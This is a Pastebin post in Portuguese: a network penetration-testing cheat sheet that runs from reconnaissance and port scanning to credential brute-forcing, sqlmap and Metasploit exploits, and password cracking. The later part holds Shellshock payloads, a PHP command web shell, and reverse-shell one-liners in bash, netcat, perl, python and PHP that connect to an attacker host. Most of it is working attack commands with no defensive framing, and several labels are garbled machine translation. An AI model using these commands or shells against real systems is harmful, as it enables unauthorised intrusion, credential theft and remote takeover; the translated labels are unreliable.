Advertisement
syst3m_h4x0r

Teste de penetração de rede

Jan 16th, 2019
25,079
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.46 KB | None | 0 0
  1. Encontre servidores de nomes
  2. $ host -t ns guif.re
  3. Encontre servidores de email
  4. $ host -t mx guif.re
  5. Bruteforcing subdomínio
  6. $ for ip in $(cat list.txt); do host $ip.guif.re; done
  7. Pesquisa reversa de DNS reverso
  8. $ for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
  9. Pedido de transferência de zona
  10. $ host -l guif.re ns1.guif.re
  11. $ dnsrecon -d guif.re -t axfr
  12. Localiza servidores de nomes para um determinado domínio
  13. $ host -t ns guif.re | cut -d " " -f 4 #
  14. $ dnsenum guif.re
  15. Varredura de transferência de zona Nmap
  16. $ nmap guif.re --script=dns-zone-transfer -p 53
  17. Localiza os nomes de domínio para um host.
  18. $ whois guif.re
  19. Encontre o IP e os servidores autorizados.
  20. $ nslookup guif.re
  21. Localiza entradas DNS de configuração incorreta.
  22. $ host -t ns guif.re
  23. TheHarvester encontra subdomínios no google, bing, etc
  24. $ python theHarvester.py -l 500 -b all -d guif.re
  25. Automatizado:
  26. #!/bin/bash
  27. nmap $1 -F # first, quick scan
  28. nmap -sV -A -O -T4 -sC $1 # verify services, Os, run scripts
  29. nmap -p 1-65535 -T5 -sT $1 # scan all ports TCP
  30. nmap -p 1-10000 -T4 -Su $1 # UDP scan
  31. Verificar todas as 65536 portas TCP / UDP, o nmap faz apenas 1000 primeiras portas por padrão
  32. Encontre anfitriões vivos
  33. nmap -sP 192.168.0.1/24
  34. Varredura de portas abertas (lenta)
  35. $ nmap -p 1-65535 -T4 -sS $ip
  36. Serviços encontrando enumeartion
  37. $ sudo nmap -sV -A -O -T4 $ip
  38. Varredura do aperto de mão 3way
  39. $ nmap -nvv -w 1 IP 22-8
  40. Varredura UDP
  41. $ nmap -nvv -sU -w 1 $ip 22-81
  42. A varredura UDP consiste em enviar um pacote UDP vazio. Aberto: responda de volta. Fechado: o pacote inacessível do ICMP é recebido
  43. ARP Scan
  44. $ arp-scan 10.10.10.1/28 -I eth0
  45. Varredura de ping do Nmap
  46. $ sudo nmap -sn -oA nmap_pingscan 10.10.10.1/24
  47. Nmap SYN / Top 100 portas de varredura
  48. $ nmap -sS -F -oA nmap_fastscan 10.10.10.1/24
  49. Varredura de versões de serviços
  50. $ nmap -sV $ip
  51. Execute os scripts padrão e a varredura de porta normal em todas as portas encontradas
  52. $ nmap -sC $ip
  53. Execute todos os scripts de varredura nmap contra as portas encontradas.
  54. $ nmap -Pn -sV -O -pT:{TCP ports found},U:{UDP ports found} --script *vuln* $ip
  55. Varredura de porta com relatório de arquivo:
  56. $ nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/192_168_15_201T 192.168.15.201
  57. Varredura completa de vulnerabilidades:
  58. $ mkdir /usr/share/nmap/scripts/vulnscan; cd /usr/share/nmap/scripts/vulnscan; git clone https://github.com/scipag/vulscan.git; nmap -sS -sV --script=/usr/share/nmap/scripts/vulnscan/vulscan.nse $ip
  59. Identifique serviços desconhecidos
  60. $ amap -d $ip <port>
  61. SMB
  62. Versões 1,2,3. TCP 139, 445 e muitas portas UDP.
  63. Enumeração
  64. $ nmblookup -A $ip
  65. $ enum4linux -a $ip
  66. Versões Samba 2.2.x são bandeira vermelha
  67. Uma sessão SMB nula pode ser usada para coletar senhas e informações úteis do SMB 1.
  68. Sessão nula e extrair informações.
  69. $ nbtscan -r $ip
  70. Versão
  71. msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run
  72. MultiExploit
  73. msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
  74. Enum rápido:
  75. $ nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
  76. Varredura vuln rápida:
  77. $ nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
  78. Enum completo e varredura vuln:
  79. $ nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
  80. Enum completo e varredura vuln:
  81. $ nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
  82. Monte:
  83. $ smbclient //$ip/share -U username
  84. Montagem anônima:
  85. $ smbclient //$ip/share # hit enter with blank password
  86. Vale a pena testar eternalblue
  87. Bruteforce
  88. $ hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb
  89. Qualquer metaploit explorado através do Netbios sobre TCP em 139, você precisa definir:
  90. > set SMBDirect false
  91. Netbios
  92. Descarregando a tabela netbios:
  93. $ nmap -Pn -sUC -p137 $ip
  94. NFS
  95. Mostrar todas as montagens
  96. $ showmount -e $ip
  97. Montar um compartilhamento NFS
  98. $ mount $ip:/vol/share /mnt/nfs
  99. Rede
  100. $ nikto -host $ip
  101. $ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web_Content/Top1000-RobotsDisallowed.txt; gobuster -u http://$ip -w Top1000-RobotsDisallowed.txt
  102. $ wfuzz -c -z list.txt --sc 200 http://$ip
  103. Descoberta de diretório
  104. $ dirb $ip /usr/share/wordlists/dirb/common.txt
  105. $ gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
  106. $ gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
  107. $ gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e
  108. $ cd /root/dirsearch; python3 dirsearch.py -u http://$ip/ -e .php
  109. Bandeira, agarrar
  110. ./whatweb $ip # identifies all known services
  111. Teste de métodos
  112. $ nmap --script http-methods --script-args http-methods.url-path='/test' $ip
  113. Autenticação de Bruteforcing
  114. $ hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin
  115. Análise de vulnerabilidade:
  116. $ nikto -host http://$ip
  117. $ nmap --script=http-vuln* $ip
  118. Teste contra o SQLI
  119. sqlmap -u "http://$ip/?query" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql
  120. Varredura de vulnerabilidade do ColdFusion
  121. $ nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
  122. Autenticação Básica do Bruteforce
  123. $ hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
  124. WebDav
  125. teste
  126. $ davtest -move -sendbd auto -url http://$ip:8080/webdav/
  127. $ cadaver http://$ip:8080/webdav/
  128. Mysql
  129. $ nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306
  130. Varredura Nmap
  131. $ nmap -sV -Pn -vv -script=mysql* $ip -p 3306
  132. Varredura Vuln:
  133. $ sqlmap -u 'http://$ip/login-off.asp' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all
  134. Se o Mysql está rodando como root e você tem acesso, você pode executar comandos:
  135. mysql> select do_system('id');
  136. mysql> \! sh
  137. MsSql
  138. Enumerar servidores MSSQL na rede
  139. msf > use auxiliary/scanner/mssql/mssql_ping
  140. $ nmap -sU --script=ms-sql-info $ip
  141. Bruteforce MsSql
  142. msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
  143. Ganhar shell usando credenciais reunidas
  144. msf > use exploit/windows/mssql/mssql_payload
  145. msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
  146. Faça o login em um servidor MsSql:
  147. # root@kali:~/dirsearch# cat ../.freetds.conf
  148. [someserver]
  149. host = $ip
  150. port = 1433
  151. tds version = 8.0
  152. user=sa
  153.  
  154. root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME
  155. Redis
  156. Enumerar:
  157. $ nmap -p6379 --script redis-info $ip
  158. Cliente:
  159. $ redis-cli -h $ip
  160. Memcached
  161. Enumerar:
  162. $ nmap -p11211 --script memcached-info $ip
  163. Extrair dados:
  164. msf > use auxiliary/gather/memcached_extractor
  165. SMTP
  166. Sempre fazer enumeração de usuários
  167. smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
  168. >use auxiliary/scanner/smtp/smtp_enum
  169. Comando para verificar se existe um usuário
  170. >VRFY root
  171. Comando para perguntar ao servidor se um usuário pertence a uma lista de discussão
  172. >EXPN root
  173. Enumeração e varredura vuln:
  174. $ nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
  175. Bruteforce
  176. $ hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
  177. Enumeração de usuário Metasploit
  178. use auxiliary/scanner/smtp/smtp_enum
  179. Teste para retransmissão aberta
  180. telnet $ip 25
  181. EHLO root
  182. DATA
  183. Subject: Testing open mail relay.
  184. Testing SMTP open mail relay. Have a nice day.
  185. .
  186. QUIT
  187. RPC (135)
  188. Enumerar, mostra se alguma montagem do NFS foi exposta:
  189. $ rpcinfo -p $ip
  190. $ nmap $ip --script=msrpc-enum
  191. msf > use exploit/windows/dcerpc/ms03_026_dcom
  192. Enumeração FTP
  193. Enumerar:
  194. $ nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
  195. Bruteforce
  196. $ hydra -l user -P /usr/share/john/password.lst ftp://$ip:21
  197. Bruteforce com metasploit
  198. $ msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login
  199. Varredura Vuln
  200. $ nmap --script=ftp-* -p 21 $ip
  201. TFTP
  202. Se o acesso não autenticado for permitido com permissões de gravação, você poderá fazer o upload de um shell:
  203. $ tftp $ip
  204. tftp> ls
  205. ?Invalid command
  206. tftp> verbose
  207. Verbose mode on.
  208. tftp> put shell.php
  209. Sent 3605 bytes in 0.0 seconds [inf bits/sec]
  210. SSH
  211. Enumeração de usuário
  212. msf > use auxiliary/scanner/ssh/ssh_enumusers
  213. $ python /usr/share/exploitdb/platforms/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
  214. Bruteforce
  215. $ hydra -v -V -l root -P password-file.txt $ip ssh

  216. Com lista de usuários:
  217. $ hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh
  218. Você pode usar * -w * para diminuir a velocidade
  219. SSL
  220. Abra uma conexão
  221. $ openssl s_client -connect $ip:443
  222. Verificação básica de cifras SSL
  223. $ nmap --script ssl-enum-ciphers -p 443 $ip
  224. Procure cifras inseguras como Triple-DES e Blowfish
  225. Ferramenta muito completa para auditoria de SSL é testssl.sh, encontra BEAST, FREAK, POODLE, heart bleed, etc ...
  226. Protocolo Simples de Gerenciamento de Rede (SNMP)
  227. É um protocolo de rede usado para coletar a organização e troca de informações entre dispositivos de rede
  228. Funciona em switches gerenciados, roteadores e SOs de servidor para fins de monitoramento. O SNMP é acessado ao fornecer uma string de comunidade válida dentro de um datagrama UDP para a porta 161. Geralmente, é público. Versões 1,2 e 3. Você pode ver os processos em execução, portas abertas, usuários, versão do Windows, software instalado.
  229. Enumeração
  230. $ for community in public private manager; do snmpwalk -c $community -v1 $ip; done
  231. $ snmpwalk -c public -v1 $ip
  232. $ snmpenum $ip public windows.txt
  233. Menos barulhento:
  234. $ snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25
  235. Baseado em UDP, sem estado e suscetível a spoofing UDP
  236. $ nmap -sU --open -p 16110.1.1.1-254 -oG out.txt
  237. $ snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called public
  238. $ snmpwalk -c public -v 2c 10.1.1.1 # version 2
  239. *$ snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users
  240. $ snmpwalk 5c public 5v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
  241. $ nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip
  242. $ snmp-check -t $ip -c public
  243. Bruteforce os nomes da comunidade:
  244. $ onesixtyone -c dict.txt -i $ip
  245. Contra cisco:
  246. use auxiliary/scanner/snmp/cisco_config_tftp
  247. POP3
  248. Autenticação de teste:
  249. telnet $ip 110
  250. USER uer@$ip
  251. PASS admin
  252. list
  253. retr 1
  254. Dedo
  255. Enumeração de usuários
  256. $ finger-user-enum.pl -U users.txt -t $ip
  257. RDP
  258. Bruteforce
  259. $ ncrack -vv --user administrator -P password-file.txt rdp://$ip
  260. $ hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
  261. RPC
  262. Enum
  263. $ nmap $ip --script=msrpc-enum
  264. Explorar:
  265. msf > use exploit/windows/dcerpc/ms03_026_dcom
  266. Kerberos
  267. Teste MS14-068
  268. LDAP
  269. Enumeração:
  270. $ ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"
  271. Kerberos
  272. É executado na porta 88, porta de gerenciamento de senha 464.
  273. Detecção de rede passiva:
  274. $ kerbcrack
  275. Enumeração do usuário:
  276. $ nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip
  277. Extração de senha de memória (passe o ticket):
  278. $ Mimikatz
  279. Enumeração de endereços de email
  280. Encontre e-mails no google, bing, pgp etc
  281. $ theharvester -d $ip -b google
  282. Informações de contato para os domínios que hospedam
  283. $ whois $ip
  284. Encontre e-mails e nome do funcionário com Recon-ng:
  285. $ recon-ng; use module; set DOMAIN $ip; run;
  286. recon/contacts/gather/http/api/whois_pocs
  287. Encontrar xss publicado ad xssed.co
  288. recon/hosts/enum/http/web/xssed
  289. Encontrar subdomínio
  290. recon/hosts/gather/http/web/google_site
  291. Localiza IPs próximos ao domínio e possíveis novos domínios
  292. recon/hosts/gather/http/web/ip_neighbor
  293. pesquisa do Google
  294. site: xxx -site: www.xxx
  295. filetype: procure documentos específicos, pdf, docx, etc.
  296. inurl
  297. intitle
  298. Outros https://www.exploit-db.com/google-hacking-database/
  299. Análise de vulnerabilidade
  300. Vulnerabilidades de serviços de pesquisa
  301. $ searchsploit --exclude=dos -t apache 2.2.3
  302. $ msfconsole; > search apache 2.2.3
  303. $ nmap -v -T4 --script="*-vuln-*" $ip
  304. O nmap possui muitos scripts NSE de varredura de vulnerabilidades em / usr / share / nmap / scripts /
  305. OpenVAS
  306. Scanner de vulnerabilidade poderoso com milhares de verificações de digitalização. Configuração:
  307. $ openvas-setup; openvas-adduser; gsd
  308. Quebra de senha
  309. MD5 32 caracteres hexadecimais.
  310. SHA-1 40 caracteres hexadecimais.
  311. SHA-256 64 caracteres hexadecimais.
  312. SHA-512 128 caracteres hexadecimais.
  313. Encontre o tipo de hash:
  314. $ hash-identifier
  315. Encontre o tipo de hash em https://hashkiller.co.uk
  316. Rodar o john irá dizer-lhe o tipo de hash, mesmo que você não queira quebrá-lo:
  317. $ john hashes.txt
  318. Cole o arquivo / etc / shadow inteiro no arquivo e execute
  319. $ john hashes.txt
  320. Cole o arquivo / etc / shadow inteiro no arquivo e execute
  321. $ john hashes.txt
  322. Quebra de GPU:
  323. $ hashcat -m 500 -a 0 -o output.txt -remove hashes.txt /usr/share/wordlists/rockyou.txt
  324. Cisão da CPU:
  325. $ john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
  326. Craqueamento * / etc / shadow *:
  327. $ unshadow /etc/passwd /etc/shadow /tmp/combined; john --wordlist=<any word list> /tmp/combined
  328. Gerando listas de palavras
  329. $ crunch 6 6 0123456789ABCDEF 5o crunch1.txt
  330. Tabelas online de arco-íris:
  331. https://crackstation.net/
  332. http://www.cmd5.org/
  333. http://crackhash.com/
  334. https://hashkiller.co.uk/md5-decrypter.aspx
  335. https://www.onlinehashcrack.com/
  336. http://rainbowtables.it64.com/
  337. http://www.md5online.org/
  338. Transferindo arquivos
  339. O primeiro passo depois de obter acesso a uma máquina remota é fazer o upload de novas ferramentas.
  340. Ferramentas do Linux: netcat, curl, wget
  341. Windows: ftp, tftp, script de shell de energia para ecoar e escrever.
  342. Faça o download do arquivo com curl:
  343. $ curl -O http://host/file
  344. Carregar um arquivo com put:
  345. $ curl --upload-file shell.php --url http://$ip/shell.php --http1.0
  346. Inicie um servidor da web em seus arquivos de veiculação da máquina local na pasta atual:
  347. $ python -m SimpleHTTPServer
  348. $ php -S $ip:80
  349. Envie arquivos usando comandos diferentes:
  350. $ nc -nlvp 4444 > incoming.exe
  351. Como um servidor FTP, o metasploit foi construído em um:
  352. use auxiliary/server/ftp
  353. auxiliary/server/tftp
  354. Servidor de compartilhamento SMB:
  355. python smbserver.py WORKSPACE /dir
  356. Curl colocar:
  357. $ curl -T 'file' 'http://$ip'
  358. Linux, montando um compartilhamento de samba:
  359. smbclient -L 1.1.1.1 --no-pass
  360. Trauma pós guerra
  361. A ferramenta a seguir irá testá-lo.
  362. $ git clone https://github.com/nccgroup/shocker; cd shocker; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose
  363. Você também pode:
  364. $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80
  365. $ curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status
  366. Shellshock sobre SSH:
  367. $ ssh username@$ip '() { :;}; /bin/bash'
  368. HeartBleed
  369. Testar servidor da web
  370. $ sslscan $ip:443
  371. Tunelando seu tráfego através de outro host
  372. $ sshuttle -r root@$ip 10.10.10.0/24
  373. Encaminhamento de porta
  374. O tipo mais simples de redirecionamento de tráfego consiste em aceitar tráfego de um endereço e porta de porta e redirecioná-lo para outro endereço e porta.
  375. Pode ser útil ignorar filtros baseados em endereços e portas. O Rinetd é uma ferramenta do Linux para fazer isso.
  376. Encaminhamento de porta local
  377. Cria um encapsulamento criptografado por meio de duas máquinas e redireciona o tráfego para um host e uma porta final, semelhante ao encaminhamento de porta. Isso é útil quando você está tentando se conectar da sua máquina a um destino usando um gateway. A sintaxe é:
  378. $ ssh gateway_host -L local_port:remote_host:remote_port
  379. Mais tarde, você pode criar uma sessão SSH para a porta local e ter um SSH encapsulado no destino:
  380. $ ssh hop_machine -L 31337:banned_machine:22
  381. $ ssh -p 31337 localhost
  382. Encaminhamento de porta remota
  383. Ele cria um túnel a partir da máquina de destino para sua máquina local, o que permite conectar-se a uma porta arbitrária no destino. Útil se o destino estiver em uma rede não roteável de sua máquina local. Isso é útil quando você está tentando se conectar a um host, atrás de um firewall que bloqueia conexões de entrada. Essa técnica funciona como a anterior, mas a conexão é iniciada a partir do gateway. A sintaxe é:
  384. $ ssh <gateway> -R <remote port to bind>:<local host>:<local port>
  385. Encaminhamento Dinâmico de Portas
  386. Permite criar um túnel a partir do destino para sua máquina e ter o tráfego roteado para qualquer host por meio do destino. Você pode configurar uma porta local para encaminhar o tráfego para vários destinos passando por um único host. É semelhante ao encaminhamento de porta local, mas permite vários destinos. Ele usa o protocolo SOCKS. A sintaxe é:
  387. $ ssh -D local_port remote_add
  388. A conexão do comando anterior é estabelecida na porta 22 do addr remoto.
  389. Pivotante
  390. 1. solte 3proxy.exe
  391. 2. Configure um arquivo de configuração:
  392. allow *_
  393. internal IP_SAME_NETWORK
  394. external IP_OTHER_NETWORK
  395. socks -p1081
  396. 3. Adicione a * / etc / proxychains.conf *:
  397. socks4 IP_SAME_NETWORK 1081
  398. 4. Digitalize:
  399. $ proxychains nmap -sT -Pn IP_OTHER_NETWORK-250 --top-ports=5
  400. Duplo giro
  401. Girando através de duas redes diferentes:
  402. Primeiro, crie um encaminhamento de porta dinâmico pela primeira rede:
  403. $ ssh -f -N -D 9050 [email protected]
  404. Edite * / etc / proxychains.conf * e adicione como gateway padrão:
  405. socks4 127.0.0.1 9050
  406. Use o proxy para criar uma segunda porta dinâmica para a segunda rede:
  407. $ proxychains ssh -f -N -D 10050 [email protected] -p 22
  408. Edite novamente * / etc / proxychains.conf * e adicione como gateway padrão:
  409. socks4 127.0.0.1 10050
  410. Agora você pode usar proxychains para dinamizar a rede de destino:
  411. $ proxychains nmap -sTV -n -PN 10.1.2.1 -254
  412. CVEs
  413. http://www.cvedetails.com/
  414. https://www.exploit-db.com/
  415. Internet Explorer 6
  416. Vulnerável à exploração msf (ms10_002_aurora)
  417. Listas
  418. /usr/share/seclists/
  419. /usr/share/wordlist/
  420. /usr/share/metasploit-framework/data/wordlists/
  421. Servidor web mínimo
  422. $ for i in 1 2 3 4 5 6 7; do echo -e '200 OK HTTP/1.1\r\nConnection:close\r\n\r\nfoo\r\n' |nc -q 0 -klvvp 80; done
  423. Cartuchos
  424. PHP
  425. <?php echo '<pre>'; echo shell_exec($_GET['cmd']); echo '</pre>'; ?>
  426. Conchas de Kali
  427. /usr/share/webshells/...
  428. /usr/share/webshells/php/php-reverse-shell.php
  429. Conchas reversas
  430. Se as conexões caírem ou não puderem ser estabelecidas, tente portas diferentes 80,443,8080 ...
  431. Melhor shell reverso do PHP:
  432. <?php
  433. echo 'running shell';
  434. $ip='YOUR_IP';
  435. $port='YOUR_PORT';
  436. $reverse_shells = array(
  437. '/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1',
  438. '0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196',
  439. '/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash',
  440. 'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe',
  441. "/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
  442. 'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p',
  443. 'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
  444. );
  445. foreach ($reverse_shells as $reverse_shell) {
  446. try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
  447. try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
  448. try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
  449. }
  450. system('id');
  451. ?>
  452. Usando o netcat
  453. nc <attacker_ip> <port> -e /bin/bash
  454. Usando bash e soquetes TCP
  455. /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
  456. Usando sh e soquetes TCP
  457. 0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196
  458. Usando telnet
  459. telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
  460. PHP e sh
  461. php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
  462. Perl e sh
  463. perl -e 'use Socket;$i="<attacker_ip>";$p=<port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  464. Bifurcação Perl:
  465. $ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  466. Python
  467. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  468. Inversa shell com script de python:
  469. #!/usr/bin/python
  470. import socket,subprocess,os
  471. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  472. s.connect(("IP",port))
  473. os.dup2(s.fileno(),0)
  474. os.dup2(s.fileno(),1)
  475. os.dup2(s.fileno(),2)
  476. p=subprocess.call(["/bin/sh","-i"])
  477. Proxy
  478. Protocolos
  479. http://
  480. http://
  481. connect://
  482. sock4://
  483. sock5://
  484. PPTP
  485. O protocolo de encapsulamento ponto-a-ponto fornece acesso remoto a dispositivos móveis, usa a porta TCP 1723 para troca de chaves e o protocolo IP 47 (GRE) para criptografar dados entre pares.
  486. Enumeração:
  487. $ nmap –Pn -sSV -p1723 $ip
  488. Bruteforce:
  489. $ cat dic.txt | thc-pptp-bruter –u admin $ip
  490. IPsec
  491. Tenta resolver os problemas de confidencialidade / integridade do protocolo IP. Ele fornece HMAC da origem e criptografa os dados.
  492. Você pode encontrar hosts que suportem o Ipsec com:
  493. $ ike-scan -q $iprange
  494. Valide o seguinte:
  495. O grupo DH pode ser inseguro, permitindo a decifração passiva.
  496. A chave pré-compartilhada (PSK) pode estar quebrada.
  497. Obtendo o XAUTH uma vez que o PSK é conhecido.
  498. Para mais informações, consulte https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part-1)/ .
  499. TLS
  500. Enumerando Protocolos Suportados e Conjuntos de Cifras
  501. $ python prober.py $ip
  502. Enumerando recursos e extensões suportados
  503. $ nmap --script ssl-enum-ciphers -p443
  504. Revisão de certificado
  505. $ nmap -p443 --script ssl-cert
  506. Você deve validar isso:
  507. O nome comum (CN) do assunto X.509 está correto para o serviço
  508. O emissor é respeitável e a cadeia de certificados é válida
  509. Os valores de chave pública RSA ou DSA são maiores que 2.048 bits
  510. Os parâmetros públicos de DH são maiores que 2.048 bits
  511. O certificado é válido e não expirou
  512. O certificado é assinado usando o SHA-256
  513. Vulnerabilidades:
  514. POODLE contra cifras do modo CBC dentro do SSL 3.0
  515. BEAST contra cifras do modo CBC via TLS 1.0
  516. Bytes de bytes em cifras RC4 em todas as versões do protocolo SSL e TLS
  517. Valide se a chave foi gerada com entropia fraca:
  518. $ nmap -p443 --script ssl-known-key $1
  519. Teste de failback:
  520. $ openssl s_client -connect $ip -no_tls1_2 -fallback_scsv
  521. Teste Dos:
  522. $ thc-ssl-dos $ip
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement